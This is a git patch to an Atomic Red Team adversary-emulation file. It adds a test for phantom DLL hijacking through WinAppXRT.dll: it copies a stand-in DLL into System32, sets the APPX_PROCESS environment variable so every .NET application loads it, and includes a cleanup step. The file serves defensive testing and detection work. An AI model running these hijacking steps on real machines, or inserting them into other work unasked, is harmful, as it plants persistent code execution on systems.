From 13f7dde9a35efb11fa84ec8b33eb569a0940457d Mon Sep 17 00:00:00 2001 From: abhijose09 Date: Wed, 24 Jul 2024 20:06:55 +0530 Subject: [PATCH] Update T1574.001.yaml (#2877) New test Added : Phantom Dll Hijacking - WinAppXRT.dll Co-authored-by: Carrie Roberts --- atomics/T1574.001/T1574.001.yaml | 23 ++++++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) diff --git a/atomics/T1574.001/T1574.001.yaml b/atomics/T1574.001/T1574.001.yaml index 663e851cff..2523fa12d5 100644 --- a/atomics/T1574.001/T1574.001.yaml +++ b/atomics/T1574.001/T1574.001.yaml @@ -19,4 +19,25 @@ atomic_tests: del %APPDATA%\updater.exe >nul 2>&1 del %APPDATA%\amsi.dll >nul 2>&1 name: command_prompt - elevation_required: true \ No newline at end of file + elevation_required: true +- name: Phantom Dll Hijacking - WinAppXRT.dll + description: | + .NET components (a couple of DLLs loaded anytime .NET apps are executed) when they are loaded they look for an environment variable called APPX_PROCESS + Setting the environmental variable and dropping the phantom WinAppXRT.dll in e.g. c:\windows\system32 (or any other location accessible via PATH) will ensure the + WinAppXRT.dll is loaded everytime user launches an application using .NET. + + Upon successful execution, amsi.dll will be copied and renamed to WinAppXRT.dll and then WinAppXRT.dll will be copied to system32 folder for loading during execution of any .NET application. + supported_platforms: + - windows + executor: + command: | + copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll + ren %APPDATA%\amsi.dll WinAppXRT.dll + copy %APPDATA%\WinAppXRT.dll %windir%\System32\WinAppXRT.dll + reg add "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /t REG_EXPAND_SZ /d "1" /f + cleanup_command: | + reg delete "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /f + del %windir%\System32\WinAppXRT.dll + del %APPDATA%\WinAppXRT.dll + name: command_prompt + elevation_required: true